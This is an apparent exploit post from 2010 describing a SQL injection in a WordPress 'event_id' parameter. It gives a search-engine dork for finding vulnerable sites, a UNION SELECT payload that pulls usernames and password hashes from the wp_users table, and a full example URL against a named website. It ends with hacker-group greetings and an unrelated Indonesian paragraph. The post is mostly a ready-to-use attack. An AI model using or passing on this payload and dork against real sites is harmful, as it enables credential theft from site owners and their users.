WordPress (?event_id=) Sql Injection Vulnerability
==========================================================
###########################################
.:. Author : vhesckot_1601
.:. Email : vhesckot@gmail.com
.:. Team : Underground
.:. Home : www.tecon-crew.org
.:. Script : WordPress
.:. Script Download: http://wordpress.org/download/html
.:. Bug Type : Sql Injection [Mysql]
.:. Dork :"powered by WordPress" inurl:"/?event_id="
.:. Date : 01/2/2010
#############################################
===[ Exploit ]===
www.site.com/?event_id=[Sql]
www.site.com/Path/?event_id=[Sql]
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Example :
http://curecmd.org/events/event-details?event_id=-22+union+select%201,concat%28user_login,0x3a,user_pass%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
==========================================================
Greats T0 : Indonesian Hacker
Memang membosankan buat kita yang gak tau untuk apa kita belajar. Pernah gw denger dari seorang bocah lugu yang duduk dibangku SD. "Kak, buat apa seh kita belajar ???". Salut gw dua jempol buat anak itu. Dia mau bertanya tentang apa yang dia tidak mengerti. Gw yakin dia akan menjadi orang yang berhasil, Amin.
0 komentar: